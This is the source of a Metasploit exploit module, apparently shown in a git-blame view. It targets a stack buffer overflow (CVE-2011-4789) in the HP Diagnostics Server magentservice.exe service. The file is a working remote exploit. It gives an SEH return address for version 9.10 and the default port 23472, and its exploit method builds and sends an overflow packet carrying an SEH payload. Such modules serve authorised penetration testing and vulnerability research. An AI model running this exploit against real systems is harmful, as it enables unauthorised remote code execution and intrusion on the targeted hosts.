metasploit-framework/modules/exploits/windows/misc/hp_magentservice.rb

80 lines
2.0 KiB
Ruby
Raw Normal View History

2013-03-07 23:53:19 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
2013-03-07 23:53:19 +00:00
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = AverageRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Diagnostics Server magentservice.exe Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP Diagnostics Server
magentservice.exe service. By sending a specially crafted packet, an attacker
may be able to execute arbitrary code. Originally found and posted by
AbdulAziz Harir via ZDI.
},
'Author' =>
[
'AbdulAziz Hariri', # Original discovery
'hal', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '72815'],
['CVE', '2011-4789'],
['ZDI', '12-016']
2013-08-30 21:28:54 +00:00
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'SSL' => true,
'SSLVersion' => 'SSL3'
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'DefaultTarget' => 0,
'Targets' =>
[
[
'Diagnostics Server 9.10',
{
# pop esi # pop ebx # ret 10
# magentservice.exe
'Ret' => 0x780c8f1f
}
]
],
'DisclosureDate' => 'Jan 12 2012'))
2013-08-30 21:28:54 +00:00
register_options([Opt::RPORT(23472)], self.class)
end
2013-08-30 21:28:54 +00:00
def exploit
2013-08-30 21:28:54 +00:00
req = "\x00\x00\x00\x00"
req << rand_text_alpha_upper(1092)
req << generate_seh_payload(target.ret)
2013-08-30 21:28:54 +00:00
connect
sock.put(req)
2013-08-30 21:28:54 +00:00
handler
disconnect
2013-08-30 21:28:54 +00:00
end
end